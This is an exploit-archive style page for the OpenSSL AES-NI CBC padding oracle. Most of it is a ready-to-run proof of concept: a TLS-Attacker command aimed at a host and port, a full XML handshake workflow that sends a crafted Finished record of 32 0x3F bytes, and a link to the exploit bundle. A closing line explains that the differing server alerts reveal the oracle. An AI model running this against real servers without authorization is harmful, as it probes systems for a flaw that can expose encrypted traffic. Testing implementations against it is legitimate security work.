OpenSSL Padding Oracle in AES-NI CBC MAC Check
Posted on 30 November -0001
<HTML><HEAD><TITLE>OpenSSL Padding Oracle in AES-NI CBC MAC Check</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY> TLS-Attacker: https://github.com/RUB-NDS/TLS-Attacker https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39768.zip You can use TLS-Attacker to build a proof of concept and test your implementation. You just start TLS-Attacker as follows: java -jar TLS-Attacker-1.0.jar client -workflow_input rsa-overflow.xml -connect $host:$port The xml configuration file (rsa-overflow.xml) looks then as follows: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <workflowTrace> <protocolMessages> <ClientHello> <messageIssuer>CLIENT</messageIssuer> <includeInDigest>true</includeInDigest> <extensions> <EllipticCurves> <supportedCurvesConfig>SECP192R1</supportedCurvesConfig> <supportedCurvesConfig>SECP256R1</supportedCurvesConfig> <supportedCurvesConfig>SECP384R1</supportedCurvesConfig> <supportedCurvesConfig>SECP521R1</supportedCurvesConfig> </EllipticCurves> </extensions> <supportedCompressionMethods> <CompressionMethod>NULL</CompressionMethod> </supportedCompressionMethods> <supportedCipherSuites> <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA</CipherSuite> <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA</CipherSuite> <CipherSuite>TLS_RSA_WITH_AES_128_CBC_SHA256</CipherSuite> <CipherSuite>TLS_RSA_WITH_AES_256_CBC_SHA256</CipherSuite> </supportedCipherSuites> </ClientHello> <ServerHello> <messageIssuer>SERVER</messageIssuer> </ServerHello> <Certificate> <messageIssuer>SERVER</messageIssuer> </Certificate> <ServerHelloDone> <messageIssuer>SERVER</messageIssuer> </ServerHelloDone> <RSAClientKeyExchange> <messageIssuer>CLIENT</messageIssuer> </RSAClientKeyExchange> <ChangeCipherSpec> <messageIssuer>CLIENT</messageIssuer> </ChangeCipherSpec> <Finished> <messageIssuer>CLIENT</messageIssuer> <records> <Record> <plainRecordBytes> <byteArrayExplicitValueModification> <explicitValue> 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F 3F </explicitValue> </byteArrayExplicitValueModification> </plainRecordBytes> </Record> </records> </Finished> <ChangeCipherSpec> <messageIssuer>SERVER</messageIssuer> </ChangeCipherSpec> <Finished> <messageIssuer>SERVER</messageIssuer> </Finished> </protocolMessages> </workflowTrace> It looks to be complicated, but it is just a configuration for a TLS handshake used in TLS-Attacker, with an explicit value for a plain Finished message (32 0x3F bytes). If you change the value in the Finished message, you will see a different alert message returned by the server. </BODY></HTML>